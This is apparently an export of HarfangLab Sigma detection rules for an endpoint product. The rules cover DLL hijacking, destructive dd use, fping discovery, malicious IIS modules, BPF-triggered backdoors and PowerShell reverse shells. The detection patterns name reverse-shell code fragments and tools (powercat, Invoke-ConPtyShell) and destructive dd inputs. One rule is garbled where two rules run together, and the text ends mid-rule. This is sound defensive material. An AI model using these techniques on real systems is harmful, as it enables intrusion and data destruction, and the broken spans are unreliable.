"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095213Z",
"creation_date": "2026-03-23T11:45:34.095215Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095219Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesremote.yml",
"content": "title: DLL Hijacking via systempropertiesremote.exe\nid: 25c7fcff-2700-4b0e-81d3-c467def3ef7e\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate signed Windows executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesremote.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e",
"rule_name": "DLL Hijacking via systempropertiesremote.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesremote.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate signed Windows executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2650626f-6d1c-4193-b47e-4a0e51549c76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.475670Z",
"creation_date": "2026-03-23T11:45:34.624029Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624033Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/dd.1.html",
"https://attack.mitre.org/techniques/T1485/",
"https://attack.mitre.org/techniques/T1027/001/"
],
"name": "t1485_suspicious_dd_usage_linux.yml",
"content": "title: Suspicious Usage of dd (Linux)\nid: 2650626f-6d1c-4193-b47e-4a0e51549c76\ndescription: |\n Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\n This could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\n It can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\n It is recommended to analyze the process calling dd to look for other malicious actions or content.\nreferences:\n - https://man7.org/linux/man-pages/man1/dd.1.html\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1027/001/\ndate: 2021/09/24\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1027.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Dd\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n # /usr/bin/dd\n # /usr/lib/klibc/bin/dd\n Image|endswith: '/dd'\n CommandLine|contains:\n - 'if=/dev/zero'\n - 'if=/dev/random'\n - 'if=/dev/urandom'\n ParentImage|contains: '?'\n\n exclusion_commandline:\n CommandLine|contains:\n - ' status=progress'\n - ' conv='\n\n exclusion_initfs:\n CommandLine|contains: 'of=/var/tmp/mkinitramfs_*/.random-seed'\n\n exclusion_cron:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_apt:\n Ancestors|contains: '|/usr/bin/apt|'\n\n exclusion_dpkg:\n Ancestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_apt-compat:\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n ParentCommandLine: '/bin/sh /etc/cron.daily/apt-compat'\n\n exclusion_cron_hourly:\n ParentCommandLine|startswith: '/bin/sh /etc/cron.hourly/'\n CommandLine: 'dd if=/dev/urandom bs=2 count=1'\n\n exclusion_filebeat:\n ParentCommandLine: '/bin/bash 
*/config/filebeat-* test'\n\n exclusion_yocto_sdk:\n Image: '/opt/yocto/*/usr/bin/dd'\n\n exclusion_cronapt:\n - ParentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n - GrandparentCommandLine: '/bin/sh /usr/sbin/cron-apt'\n\n exclusion_netflow:\n CommandLine: 'dd bs=18 count=1 if=/dev/urandom'\n ParentCommandLine: '/bin/bash -ue .command.run'\n\n exclusion_leapp:\n - ParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/leapp '\n - '/usr/bin/python2 /usr/bin/leapp '\n - '/usr/libexec/platform-python /bin/leapp '\n - '/usr/libexec/platform-python /usr/bin/leapp '\n - CurrentDirectory|startswith: '/usr/share/leapp-repository/repositories/system_upgrade/common/actors/'\n\n exclusion_rust:\n GrandparentCommandLine|endswith: '/.rustup/toolchains/stable-x86_64-unknown-linux*/bin/cargo'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_commvault:\n - Ancestors|contains: '|/opt/commvault/Base64/cvflock|'\n - CommandLine: 'dd if=/dev/urandom bs=1 count=32'\n ParentCommandLine|startswith:\n - '/bin/sh /opt/commvault/Base/Galaxy '\n - '/bin/sh /opt/commvault?/Base/Galaxy '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2650626f-6d1c-4193-b47e-4a0e51549c76",
"rule_name": "Suspicious Usage of dd (Linux)",
"rule_description": "Detects the execution of dd with /dev/zero, /dev/random or /dev/urandom as its input file.\nThis could be used by an attacker to either securely delete a file from the disk or to achieve mass data destruction.\nIt can also be used as a binary padding technique to add junk data and change the on-disk representation of a file.\nIt is recommended to analyze the process calling dd to look for other malicious actions or content.\n",
"rule_creation_date": "2021-09-24",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1027.001",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "268199bf-94d2-43fe-aa0c-677157a424c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612240Z",
"creation_date": "2026-03-23T11:45:34.612244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612252Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.kali.org/tools/fping/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_fping.yml",
"content": "title: Fping Execution\nid: 268199bf-94d2-43fe-aa0c-677157a424c0\ndescription: |\n Detects the execution of fping, a ping-like tool that uses the Internet Control Message Protocol (ICMP) to discover active devices within a network.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate other actions taken by this user in their session.\nreferences:\n - https://www.kali.org/tools/fping/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Fping\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/fping'\n ParentImage|contains: '?'\n\n exclusion_zabbix:\n - ParentImage: '/usr/sbin/zabbix_server'\n - GrandparentImage:\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_proxy'\n - '/usr/sbin/zabbix_server_mysql'\n - '/usr/sbin/zabbix_server_pgsql'\n - '/usr/sbin/zabbix_proxy_mysql'\n - '/usr/sbin/zabbix_proxy_pgsql'\n - ParentCommandLine:\n - 'sh -c /usr/bin/fping -C3 -i0 2>&1 &1 |]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n LibraryType: 'Native'\n AgentVersion|gte|version: 4.3 # Starting this version, managed/native DLL are both considered and are not detected the same way. 
See 0ae4376f-360f-4b97-9b3f-4c735a82fbf6 for previous variant.\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmap.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - 
'?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 
'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_textcontrol:\n ImageLoaded: '?:\\inetpub\\wwwroot\\bin\\tx??_*.dll'\n Company: 'Text Control GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "29dfc6e6-c42a-4009-8e21-367675f7e417",
"rule_name": "Suspicious IIS Module Loaded",
"rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2026-01-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1505.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a006be4-b10c-4a12-ab2f-98057371169c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620176Z",
"creation_date": "2026-03-23T11:45:34.620178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620182Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
"https://nikhilh-20.github.io/blog/cbpf_bpfdoor/",
"https://github.com/gwillgues/BPFDoor",
"https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware",
"https://attack.mitre.org/techniques/T1205/001/"
],
"name": "t1205_001_possible_cbpf_covert_backdoor.yml",
"content": "title: Possible Classic BPF Triggered Covert Backdoor\nid: 2a006be4-b10c-4a12-ab2f-98057371169c\ndescription: |\n Detects a Classic BPF program loaded with instructions commonly used by malware.\n Threat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\n Because Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\n Attackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\n Finally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\n It is recommended to check the process which loaded the Classic BPF program for suspicious activities.\nreferences:\n - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\n - https://nikhilh-20.github.io/blog/cbpf_bpfdoor/\n - https://github.com/gwillgues/BPFDoor\n - https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware\n - https://attack.mitre.org/techniques/T1205/001/\ndate: 2025/08/11\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.001\n - attack.t1205.002\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'cbpf_load'\n BpfDump|contains|all:\n # ldh [0xc] : Get the \"EtherType\" field at offset 0xc\n - 
'280000000c000000'\n # jeq 0x800, ??? : if EtherType == IPv4 (0x800), jump\n - '15000????0080000'\n # ldh [0x14] : Get the \"Fragment Offset\" of the IPv4 header\n # jset 0x1fff, ?? : Compare the Fragment Offset value with 0x1fff\n - '2800000014000000450?????ff1f0000'\n # ldb [0x17] : Get the protocol field at offset 0x17 in the IPv4 header\n - '3000000017000000'\n # ldxb 4*([14]&0xf) : Loads a byte from offset 14 and performs various operations\n # to get the total size of the IPv4 header\n - 'b10000000e000000'\n InstructionCount|gte: 15\n\n exclusion_networking_tools:\n Image:\n # tcpdump\n - '/usr/bin/tcpdump'\n - '/usr/sbin/tcpdump'\n - '/usr/local/bin/tcpdump'\n - '/usr/bin/dumpcap'\n # nmap\n - '/usr/local/bin/nmap'\n - '/opt/domotz/bin/domotz_nmap'\n - '/usr/lib/nmap/nmap'\n # openvas\n - '*/sbin/openvas'\n - '*/sbin/openvassd'\n - '/opt/detect/sbin/openvassd'\n # dhclient\n - '/sbin/dhclient'\n - '/usr/sbin/dhclient'\n - '/usr/local/dhcp_probe/bin/dhcp_probe'\n # nessusd\n - '/opt/nessus/sbin/nessusd'\n # vdcm\n - '/opt/vdcm/libexec/DCM_IO'\n # dhcp\n - '/usr/sbin/kea-dhcp4'\n - '/opt/kea/sbin/kea-dhcp4'\n - '/usr/sbin/dhcpd'\n # radsniff\n - '/usr/bin/radsniff'\n # dns\n - '*/bin/dnstop'\n # traceroute\n - '/usr/bin/tcptraceroute.mt'\n # port-knock server\n - '*/sbin/knockd'\n\n exclusion_containers:\n ProcessAncestors|contains:\n - '/bin/containerd-shim'\n - '|/usr/bin/lxc-start'\n\n exclusion_security_tools:\n Image:\n - '/opt/endpoint-agent/agent' # Sekoia\n - '/usr/share/auditbeat/bin/auditbeat'\n - '/usr/bin/suricata'\n\n exclusion_fingerbank:\n Image : '/usr/local/fingerbank/collector/fingerbank-collector'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2a006be4-b10c-4a12-ab2f-98057371169c",
"rule_name": "Possible Classic BPF Triggered Covert Backdoor",
"rule_description": "Detects a Classic BPF program loaded with instructions commonly used by malware.\nThreat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\nBecause Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\nAttackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\nFinally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\nIt is recommended to check the process that loaded the Classic BPF program for suspicious activities.\n",
"rule_creation_date": "2025-08-11",
"rule_modified_date": "2026-01-22",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1205.001",
"attack.t1205.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296703Z",
"creation_date": "2026-03-23T11:45:35.296705Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296710Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1",
"https://github.com/besimorhino/powercat",
"https://github.com/antonioCoco/ConPtyShell",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_reverse_shell_powershell.yml",
"content": "title: PowerShell Reverse Shell Executed\nid: 2a2ab0d4-c555-4e90-b3f0-e8025296440a\ndescription: |\n Detects suspicious reverse shell execution via PowerShell.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\nreferences:\n - https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1\n - https://github.com/besimorhino/powercat\n - https://github.com/antonioCoco/ConPtyShell\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/07/01\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command1:\n PowershellCommand|contains|all:\n - 'Net.Sockets.TCPClient'\n - '.GetStream('\n - '.Read('\n - '.GetString('\n\n selection_command2:\n # https://podalirius.net/fr/reverse-shells/windows-reverse-shells-cheatsheet/\n PowershellCommand|contains|all:\n - 'New-Object -TypeName System.Text.ASCIIEncoding).GetString('\n - '(pwd).Path'\n - '([Text.Encoding]::ASCII).GetBytes('\n\n selection_cmdlet:\n PowershellCommand|contains:\n # https://github.com/besimorhino/powercat\n - 'powercat '\n # https://github.com/antonioCoco/ConPtyShell\n - 'Invoke-ConPtyShell '\n\n exclusion_bmc:\n ProcessParentCommandLine: '?:\\Program Files\\BMC Software\\BladeLogic\\RSCD\\/RSCD.exe'\n PowershellCommand|contains|all:\n - 'Opening the socket from $sourceIP'\n - 'tConnected !'\n\n exclusion_defender:\n PowershellScriptPath: 
